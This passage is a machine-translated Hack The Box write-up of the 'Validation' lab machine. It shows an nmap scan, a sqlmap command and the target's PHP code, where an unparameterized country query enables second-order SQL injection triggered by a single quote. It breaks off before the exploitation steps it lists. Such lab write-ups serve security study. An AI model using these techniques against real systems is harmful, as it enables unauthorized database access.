{"componentChunkName":"component---src-templates-post-template-js","path":"/hackthebox-linux-validation-en","result":{"data":{"markdownRemark":{"id":"724734e7-f559-52f6-86b6-5d3ddde112dc","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/hackthebox-linux-validation\">original page</a>.</p>\n</blockquote>\n<p>I study security using a penetration-testing training platform called Hack The Box.\nAt the time of writing, my Hack The Box rank is ProHacker.</p>\n<img src=\"http://www.hackthebox.eu/badge/image/327080\" alt=\"Hack The Box\">\n<p>This time, I am writing up the retired HackTheBox machine “Validation.”</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 701px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/f4631b855d7057f68e6f602c11d0ae03/49217/image-71.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 74.58333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAAC00lEQVQ4y3WT207UUBSG59IoMNNpp6dpu3vYPcy5AzNAuNCohAsgEggYhCszakyMSqKSQEwmSOID6IWnRIwPYKIPoI/gI/2u7jIOhHDxp7sra33911rdhZLuoai5yJ5nJWKGh0nZxVWJoeREKJkJxZuQjTaiyCd54G4I3WxSTQeal6JQ1KlQI4DuXoBNEMxq+Li108XyoIdovomi3IFhpGBBC16Ywg+6sKwOKloXEsULJQIVtQx03uWk7MGqM6zuruPjwS5+DrexuTNA98Y0lDKBklnweAY8nEHV7kLTUoJeApTI3bUSw9ydJjauH+PXm8/4e/IdW/0TrA2WIFPbPG4h9hvgrA2dEVBPBbQwmt/ZOQogza2/0sKDrbf48f4r/nz5hsc3j7G8uwhVJ1BcRxJOw6W5qeRQp5aztguXLqXiQ+MuBvsr+PDuCL8/PcXw6DYaC31aQgqbT4NHcwKoOx0RU2gxF1oewScqNm3XgcodLN5Lsfawj6DXgGK2oDGSS4sJe/ACatmrwSBVrNq45RyYnydVBq/WhenXYbpNSqzDSMiFl8VmKNaGWm0giLpgvAnVTaCTytVk3HLmMpNk+LgimVhd38bzl4d4svcK+4dDHA6P8ejFM+wdvMbG3fvQjDr8kD5AzjSW0D9YgxrW8pbHDk/nR+cMzOIOOWrATVJSBxZvIerNgrVobrxxqhr0iKBRApmFOVCxSc55yTaDZNmYUBx4fQ2tpYqYqVS1oLgeQeiGxLk0zqGw3FRh3K6LKXHOJRkBOc3iPlTPg+rTBwyOshFSoY+iSjnZM1so5Yh8qhMOp2gJqhNTi2kOpvcqXa0kXUDcmUfZDMU11P0YXrsG2eIiT3US8OYsLZBujxWOgPkyytVAQMfLCWC4dVE0yhHjYUzMeNSVYkX/YVmsUFQdlCoOioqNqYpFICeXblOCJTSOUa7mjN9JpSxPtUW8bDr4BxJRrXhLT5C3AAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/f4631b855d7057f68e6f602c11d0ae03/8ac56/image-71.webp 240w,\n/static/f4631b855d7057f68e6f602c11d0ae03/d3be9/image-71.webp 480w,\n/static/f4631b855d7057f68e6f602c11d0ae03/e2a71/image-71.webp 701w\"\n              sizes=\"(max-width: 701px) 100vw, 701px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/f4631b855d7057f68e6f602c11d0ae03/8ff5a/image-71.png 240w,\n/static/f4631b855d7057f68e6f602c11d0ae03/e85cb/image-71.png 480w,\n/static/f4631b855d7057f68e6f602c11d0ae03/49217/image-71.png 701w\"\n            sizes=\"(max-width: 701px) 100vw, 701px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/f4631b855d7057f68e6f602c11d0ae03/49217/image-71.png\"\n            alt=\"image-71.png\"\n            title=\"image-71.png\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"about-this-article\" style=\"position:relative;\"><a href=\"#about-this-article\" aria-label=\"about this article permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>About This Article</h2>\n<p><strong>The content of this article is not intended to encourage actions that violate social order.</strong></p>\n<p>Please note in advance that attempting attacks against any environment other than one you own or have been explicitly authorized to test may violate applicable laws.</p>\n<p>All statements here are my own and do not represent any organization I belong to.</p>\n<!-- omit in toc -->\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#enumeration\">Enumeration</a></li>\n<li>\n<p><a href=\"#sqli\">SQLi</a></p>\n<ul>\n<li><a href=\"#second-order-sql-injection\">Second-Order SQL Injection</a></li>\n<li><a href=\"#union-injection\">UNION Injection</a></li>\n</ul>\n</li>\n<li><a href=\"#privilege-escalation\">Privilege Escalation</a></li>\n<li><a href=\"#conclusion\">Conclusion</a></li>\n</ul>\n<h2 id=\"enumeration\" style=\"position:relative;\"><a href=\"#enumeration\" aria-label=\"enumeration permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Enumeration</h2>\n<p>As usual, I started with the standard scan.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">Starting Nmap <span class=\"token number\">7.92</span> <span class=\"token punctuation\">(</span> https://nmap.org <span class=\"token punctuation\">)</span> at <span class=\"token number\">2021</span>-10-28 <span class=\"token number\">22</span>:29 JST\nWarning: <span class=\"token number\">10.10</span>.11.116 giving up on port because retransmission cap hit <span class=\"token punctuation\">(</span><span class=\"token number\">6</span><span class=\"token punctuation\">)</span>.\nNmap scan report <span class=\"token keyword\">for</span> <span class=\"token variable\">$RHOST</span> <span class=\"token punctuation\">(</span><span class=\"token number\">10.10</span>.11.116<span class=\"token punctuation\">)</span>\nHost is up <span class=\"token punctuation\">(</span><span class=\"token number\">0</span>.40s latency<span class=\"token punctuation\">)</span>.\nNot shown: <span class=\"token number\">992</span> closed tcp ports <span class=\"token punctuation\">(</span>conn-refused<span class=\"token punctuation\">)</span>\nPORT     STATE    SERVICE       VERSION\n<span class=\"token number\">22</span>/tcp   <span class=\"token function\">open</span>     <span class=\"token function\">ssh</span>           OpenSSH <span class=\"token number\">8</span>.2p1 Ubuntu 4ubuntu0.3 <span class=\"token punctuation\">(</span>Ubuntu Linux<span class=\"token punctuation\">;</span> protocol <span class=\"token number\">2.0</span><span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span> ssh-hostkey: \n<span class=\"token operator\">|</span>   <span class=\"token number\">3072</span> d8:f5:ef:d2:d3:f9:8d:ad:c6:cf:24:85:94:26:ef:7a <span class=\"token punctuation\">(</span>RSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>   <span class=\"token number\">256</span> <span class=\"token number\">46</span>:3d:6b:cb:a8:19:eb:6a:d0:68:86:94:86:73:e1:72 <span class=\"token punctuation\">(</span>ECDSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>_  <span class=\"token number\">256</span> <span class=\"token number\">70</span>:32:d7:e3:77:c1:4a:cf:47:2a:de:e5:08:7a:f8:7a <span class=\"token punctuation\">(</span>ED25519<span class=\"token punctuation\">)</span>\n<span class=\"token number\">80</span>/tcp   <span class=\"token function\">open</span>     http          Apache httpd <span class=\"token number\">2.4</span>.48 <span class=\"token variable\"><span class=\"token punctuation\">((</span>Debian<span class=\"token punctuation\">))</span></span>\n<span class=\"token operator\">|</span>_http-title: Site doesn't have a title <span class=\"token punctuation\">(</span>text/html<span class=\"token punctuation\">;</span> <span class=\"token assign-left variable\">charset</span><span class=\"token operator\">=</span>UTF-8<span class=\"token punctuation\">)</span>.\n<span class=\"token operator\">|</span>_http-server-header: Apache/2.4.48 <span class=\"token punctuation\">(</span>Debian<span class=\"token punctuation\">)</span>\n<span class=\"token number\">5000</span>/tcp filtered upnp\n<span class=\"token number\">5001</span>/tcp filtered commplex-link\n<span class=\"token number\">5002</span>/tcp filtered rfe\n<span class=\"token number\">5003</span>/tcp filtered filemaker\n<span class=\"token number\">5004</span>/tcp filtered avt-profile-1\n<span class=\"token number\">8080</span>/tcp <span class=\"token function\">open</span>     http          nginx\n<span class=\"token operator\">|</span>_http-title: <span class=\"token number\">502</span> Bad Gateway\nService Info: OS: Linux<span class=\"token punctuation\">;</span> CPE: cpe:/o:linux:linux_kernel\n\nService detection performed. Please report any incorrect results at https://nmap.org/submit/ <span class=\"token builtin class-name\">.</span>\nNmap done: <span class=\"token number\">1</span> IP address <span class=\"token punctuation\">(</span><span class=\"token number\">1</span> <span class=\"token function\">host</span> up<span class=\"token punctuation\">)</span> scanned <span class=\"token keyword\">in</span> <span class=\"token number\">137.03</span> seconds</code></pre></div>\n<p>A somewhat mysterious web application was running on port 80.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 824px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/78e7457e76ed057957b5367ccf27cb3d/c1c45/image-72.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 74.58333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAPCAYAAADkmO9VAAAACXBIWXMAAAsTAAALEwEAmpwYAAABlUlEQVQ4y62O2U4CQRBF+1vUxA0jIgJiRGQRAYkobogaDTH+gi8++YmgrL5oEElkGMAh7NeuZgZB8W06Oanqqlu3ivX7fXS7XVSrVXwpCo81KEoDsiyj1Wqh0WigVqsJSDPoK0JTLkuoVCpoNpsgn16vBwb+2u02Uqk0isUP5PMvKBTekU5nUK/XUSqVkEg8IZvNIZPJiv7r6xtyuTySyWcxJ0kStMdoyydtkqt8myyixKPMLylLFZFrdQ2qUU/mFxMSz8mDvJg7cAh3IIJBHMcTjAwRmqCK2nepjM6wpTUHRjGoccG0gVnjOuZW7Jgz2jHP/yLyv8E8rh2FmewuDFmn6May1Qnv3hHCJ1fwh88E27vhYb664cGKqh2b5zBq/GbZto1QJIbo9R1OLuI4jsWF0enlLSLnN7A4fGLppNk/hkZuRptd/gNsekNw8ssCB1Fs+fbFlTuhY2FIuomGdP4kNAGZ25x+WLmJVqO++Z85Nm1YwyRmDJYhU4tmzk/tvxmC3T88Qk8YdH6s0+lAT/S/UG/Db+CMQc8/VzPUAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/78e7457e76ed057957b5367ccf27cb3d/8ac56/image-72.webp 240w,\n/static/78e7457e76ed057957b5367ccf27cb3d/d3be9/image-72.webp 480w,\n/static/78e7457e76ed057957b5367ccf27cb3d/5758c/image-72.webp 824w\"\n              sizes=\"(max-width: 824px) 100vw, 824px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/78e7457e76ed057957b5367ccf27cb3d/8ff5a/image-72.png 240w,\n/static/78e7457e76ed057957b5367ccf27cb3d/e85cb/image-72.png 480w,\n/static/78e7457e76ed057957b5367ccf27cb3d/c1c45/image-72.png 824w\"\n            sizes=\"(max-width: 824px) 100vw, 824px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/78e7457e76ed057957b5367ccf27cb3d/c1c45/image-72.png\"\n            alt=\"image-72.png\"\n            title=\"image-72.png\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>It seemed to be an application that automatically registers a user when you POST a username and country, then displays other users from the same country.</p>\n<p>Since it retrieved and displayed the username, I continued the investigation from the assumption that SQLi might work.</p>\n<p>There was also an XSS vulnerability, but it was the kind that did not lead to a shell, so I ignored it.</p>\n<h2 id=\"sqli\" style=\"position:relative;\"><a href=\"#sqli\" aria-label=\"sqli permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>SQLi</h2>\n<p>I tried running sqlmap as a test, but both <code class=\"language-text\">username</code> and <code class=\"language-text\">country</code> came back as <code class=\"language-text\">does not seem to be injectable</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">python3 sqlmap.py -u <span class=\"token string\">\"http://<span class=\"token variable\">$RHOST</span>/\"</span> --data <span class=\"token string\">\"username=test&amp;country=Ukraine\"</span></code></pre></div>\n<p>Apparently the input form does escape input values.</p>\n<h3 id=\"second-order-sql-injection\" style=\"position:relative;\"><a href=\"#second-order-sql-injection\" aria-label=\"second order sql injection permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Second-Order SQL Injection</h3>\n<p>This application has a second-order SQL injection vulnerability.</p>\n<p>Reference: <a href=\"https://gallu.hatenadiary.jp/entry/20060105/p1\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">second-order SQL injection - Garu’s Memorandum</a></p>\n<p>In practice, the application was doing something like the following behind the scenes.</p>\n<div class=\"gatsby-highlight\" data-language=\"php\"><pre class=\"language-php\"><code class=\"language-php\"><span class=\"token php language-php\"><span class=\"token delimiter important\">&lt;?php</span>\n  <span class=\"token keyword\">require</span><span class=\"token punctuation\">(</span><span class=\"token string single-quoted-string\">'config.php'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span> <span class=\"token variable\">$_SERVER</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'REQUEST_METHOD'</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">==</span> <span class=\"token string single-quoted-string\">'POST'</span> <span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token variable\">$userhash</span> <span class=\"token operator\">=</span> <span class=\"token function\">md5</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'username'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token variable\">$sql</span> <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"INSERT INTO registration (username, userhash, country, regtime) VALUES (?, ?, ?, ?)\"</span><span class=\"token punctuation\">;</span>\n    <span class=\"token variable\">$stmt</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$conn</span><span class=\"token operator\">-></span><span class=\"token function\">prepare</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$sql</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token variable\">$stmt</span><span class=\"token operator\">-></span><span class=\"token function\">bind_param</span><span class=\"token punctuation\">(</span><span class=\"token string double-quoted-string\">\"sssi\"</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'username'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$userhash</span> <span class=\"token punctuation\">,</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'country'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token function\">time</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token variable\">$stmt</span><span class=\"token operator\">-></span><span class=\"token function\">execute</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span><span class=\"token punctuation\">;</span>\n            <span class=\"token function\">setcookie</span><span class=\"token punctuation\">(</span><span class=\"token string single-quoted-string\">'user'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$userhash</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n            <span class=\"token function\">header</span><span class=\"token punctuation\">(</span><span class=\"token string double-quoted-string\">\"Location: /account.php\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n            <span class=\"token keyword\">exit</span><span class=\"token punctuation\">;</span>\n    <span class=\"token punctuation\">}</span>\n    <span class=\"token variable\">$sql</span> <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"update registration set country = ? where username = ?\"</span><span class=\"token punctuation\">;</span>\n    <span class=\"token variable\">$stmt</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$conn</span><span class=\"token operator\">-></span><span class=\"token function\">prepare</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$sql</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token variable\">$stmt</span><span class=\"token operator\">-></span><span class=\"token function\">bind_param</span><span class=\"token punctuation\">(</span><span class=\"token string double-quoted-string\">\"ss\"</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'country'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$_POST</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'username'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token variable\">$stmt</span><span class=\"token operator\">-></span><span class=\"token function\">execute</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">setcookie</span><span class=\"token punctuation\">(</span><span class=\"token string single-quoted-string\">'user'</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$userhash</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">header</span><span class=\"token punctuation\">(</span><span class=\"token string double-quoted-string\">\"Location: /account.php\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token keyword\">exit</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n<span class=\"token delimiter important\">?></span></span></code></pre></div>\n<p>It stored POSTed values in the database through placeholders and then redirected to <code class=\"language-text\">/account.php</code>.</p>\n<div class=\"gatsby-highlight\" data-language=\"php\"><pre class=\"language-php\"><code class=\"language-php\"><span class=\"token php language-php\"><span class=\"token delimiter important\">&lt;?php</span> \n  <span class=\"token keyword\">include</span><span class=\"token punctuation\">(</span><span class=\"token string single-quoted-string\">'config.php'</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token variable\">$user</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$_COOKIE</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'user'</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">;</span>\n  <span class=\"token variable\">$sql</span> <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"SELECT username, country FROM registration WHERE userhash = ?\"</span><span class=\"token punctuation\">;</span>\n  <span class=\"token variable\">$stmt</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$conn</span><span class=\"token operator\">-></span><span class=\"token function\">prepare</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$sql</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token variable\">$stmt</span><span class=\"token operator\">-></span><span class=\"token function\">bind_param</span><span class=\"token punctuation\">(</span><span class=\"token string double-quoted-string\">\"s\"</span><span class=\"token punctuation\">,</span> <span class=\"token variable\">$user</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token variable\">$stmt</span><span class=\"token operator\">-></span><span class=\"token function\">execute</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  \n  <span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$stmt</span><span class=\"token operator\">-></span><span class=\"token function\">get_result</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span> <span class=\"token comment\">// get the mysqli result</span>\n  <span class=\"token variable\">$row</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$result</span><span class=\"token operator\">-></span><span class=\"token function\">fetch_assoc</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span> <span class=\"token comment\">// fetch data   </span>\n  <span class=\"token keyword\">echo</span> <span class=\"token string single-quoted-string\">'&lt;h1 class=\"text-white\">Welcome '</span> <span class=\"token operator\">.</span> <span class=\"token variable\">$row</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'username'</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">.</span> <span class=\"token string single-quoted-string\">'&lt;/h1>'</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">echo</span> <span class=\"token string single-quoted-string\">'&lt;h3 class=\"text-white\">Other Players In '</span> <span class=\"token operator\">.</span> <span class=\"token variable\">$row</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'country'</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">.</span> <span class=\"token string single-quoted-string\">'&lt;/h3>'</span><span class=\"token punctuation\">;</span>\n  <span class=\"token variable\">$sql</span> <span class=\"token operator\">=</span> <span class=\"token string double-quoted-string\">\"SELECT username FROM registration WHERE country = '\"</span> <span class=\"token operator\">.</span> <span class=\"token variable\">$row</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'country'</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">.</span> <span class=\"token string double-quoted-string\">\"'\"</span><span class=\"token punctuation\">;</span>\n  <span class=\"token variable\">$result</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$conn</span><span class=\"token operator\">-></span><span class=\"token function\">query</span><span class=\"token punctuation\">(</span><span class=\"token variable\">$sql</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">while</span> <span class=\"token punctuation\">(</span><span class=\"token variable\">$row</span> <span class=\"token operator\">=</span> <span class=\"token variable\">$result</span><span class=\"token operator\">-></span><span class=\"token function\">fetch_assoc</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token keyword\">echo</span> <span class=\"token string double-quoted-string\">\"&lt;li class='text-white'>\"</span> <span class=\"token operator\">.</span> <span class=\"token variable\">$row</span><span class=\"token punctuation\">[</span><span class=\"token string single-quoted-string\">'username'</span><span class=\"token punctuation\">]</span> <span class=\"token operator\">.</span> <span class=\"token string double-quoted-string\">\"&lt;/li>\"</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n<span class=\"token delimiter important\">?></span></span></code></pre></div>\n<p>In the input form in <code class=\"language-text\">index.php</code>, the SQL query used placeholders. However, the part in <code class=\"language-text\">account.php</code> that retrieved the user and country did not use placeholders.</p>\n<p>For that reason, a second-order SQL injection vulnerability exists.</p>\n<p>So, if you put <code class=\"language-text\">'</code> in the Country input field at the time of the redirect, <code class=\"language-text\">Faital Error</code> appears in the browser, which tells us SQLi is likely possible.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/bbab3fe536e329528e641f802c96bf88/2bef9/image-73-1024x651.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 63.74999999999999%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAARlAAAEZQAGA43XUAAACEUlEQVQ4y41Si27TQBD0V1Mqqoam6iMtLXwJv8AnIIFomwTyfjix49fFZ/vs8zB3bqKoCCmrjO7i253dnV3nvH2Nkw/neE+cnJ7hlOc7nmetS7SvOmhdXOHi8ga3dw/o3D9a3H36zP+PuOk88P4F17f3aLWv8JFczvRPH2LjI04SKJkilxJCCOhcAmWBNOW3PIPYbiGzDNutsN8abJHxW8LYUhUoihxO+u0rMP6FvKwYSAKZoao0HRT5Ct4rlASg+atQ81bXNTRh/My71jVCIW2sM+6+4HkwZ2ZmY3V4DdhBa22DfzwPMR0OkcQxYiKlf1WWlrCmz2gZwPMDOC+/J/jZn8FdLi1pk1HvyWo09r03x1NviPGImEzgrlYIoxA5uzCoSgXFrpzBYAZ/HWBDHaMoarJTH6ONZMXGqa41kjAl2QbzuQ+XhKHrIqdvSb2V0dxUyuwknGI6XcN1NwjDEL7v26EYsgaZFdv3BYajAMslB8jEmu0ajQ3M3XRkzOn3F5jNEkwma3ieZ0nzPLdtFMTOpMxZueKbQsapm3fTRWUHhv2wnG53xnYFAlYmuRKKZLUpn1lxMBzs1fzX7Puuwl6PA1ml8BYeNos1RBCi5H4ZberX7G8n/xZ7UkM4Gq9YnUAUJGw3hYyjpmWl7GnaMqeZ+GHg/8yJ48Qupiq4yIp7RSKjyyF2a3QUoZnoMXYs4V+dCdcorTWcFAAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/bbab3fe536e329528e641f802c96bf88/8ac56/image-73-1024x651.webp 240w,\n/static/bbab3fe536e329528e641f802c96bf88/d3be9/image-73-1024x651.webp 480w,\n/static/bbab3fe536e329528e641f802c96bf88/e46b2/image-73-1024x651.webp 960w,\n/static/bbab3fe536e329528e641f802c96bf88/a9a89/image-73-1024x651.webp 